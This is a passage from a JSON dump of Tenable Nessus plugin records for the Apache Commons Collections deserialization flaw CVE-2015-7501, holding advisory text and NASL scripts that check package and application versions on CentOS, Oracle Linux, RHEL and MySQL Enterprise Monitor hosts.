deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-December/021558.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7af40c53\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:36:09", "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.6.7959.\nIt is, therefore, affected by a remote code execution vulnerability in the JMXInvokerServlet interface due to improper validation of Java objects before deserialization. An authenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2015-7501)", "cvss3": {}, "published": "2017-01-25T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.1.x < 3.1.6.7959 Java Object Deserialization RCE (January 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_3_1_6_7959.NASL", "href": "https://www.tenable.com/plugins/nessus/96768", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96768);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_bugtraq_id(78215);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.1.x < 3.1.6.7959 Java Object Deserialization RCE (January 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.1.x prior to 3.1.6.7959.\nIt is, therefore, affected by a remote code execution vulnerability in\nthe JMXInvokerServlet interface due to improper validation of Java\nobjects before deserialization. An authenticated, remote attacker can\nexploit this to execute arbitrary code. (CVE-2015-7501)\");\n # https://dev.mysql.com/doc/relnotes/mysql-monitor/3.1/en/news-3-1-6.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0752b1b7\");\n # http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a1c38e52\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.1.6.7959 or later as\nreferenced in the January 2017 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/25\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfix = \"3.1.6.7959\";\nvuln = FALSE;\nif (version =~ \"^3\\.1($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;;\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:32", "description": "From Red Hat Security Advisory 2015:2671 :\n\nUpdated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-22T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : jakarta-commons-collections (ELSA-2015-2671)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:jakarta-commons-collections", "p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework", "p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-2671.NASL", "href": "https://www.tenable.com/plugins/nessus/87547", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2671 and \n# Oracle Linux Security Advisory ELSA-2015-2671 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87547);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2671\");\n\n script_name(english:\"Oracle Linux 5 : jakarta-commons-collections (ELSA-2015-2671)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2671 :\n\nUpdated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-December/005654.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-collections packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-testframework-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2-2jpp.4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"jakarta-commons-collections-tomcat5-3.2-2jpp.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T22:32:05", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4274 advisory.\n\n - apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-01-23T00:00:00", "type": "nessus", "title": "RHEL 7 : rh-maven35-apache-commons-collections4 (RHSA-2020:4274)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4", "p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4-javadoc"], "id": "REDHAT-RHSA-2020-4274.NASL", "href": "https://www.tenable.com/plugins/nessus/170296", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4274. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(170296);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2020:4274\");\n\n script_name(english:\"RHEL 7 : rh-maven35-apache-commons-collections4 (RHSA-2020:4274)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4274 advisory.\n\n - apache-commons-collections: InvokerTransformer code execution during deserialisation (CVE-2015-7501)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-7501\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4274\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1279330\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rh-maven35-apache-commons-collections4 and / or rh-maven35-apache-commons-collections4-javadoc\npackages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(284, 502);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/01/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rh-maven35-apache-commons-collections4-javadoc\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/armv8-a/aarch64/rhscl/1/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/rhscl/1/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/rhscl/1/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/rhscl/1/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/os',\n 'content/dist/rhel/power/7/7Server/ppc64/rhscl/1/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/os',\n 'content/dist/rhel/server/7/7Server/x86_64/rhscl/1/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/rhscl/1/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/rhscl/1/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'rh-maven35-apache-commons-collections4-4.0-7.3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'rh-maven35-apache-commons-collections4-javadoc-4.0-7.3.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'rh-maven35-apache-commons-collections4 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:29", "description": "Security fix for CVE-2017-5645\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : log4j12 (2017-b8358cda24)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5645"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:log4j12", "cpe:/o:fedoraproject:fedora:26"], "id": 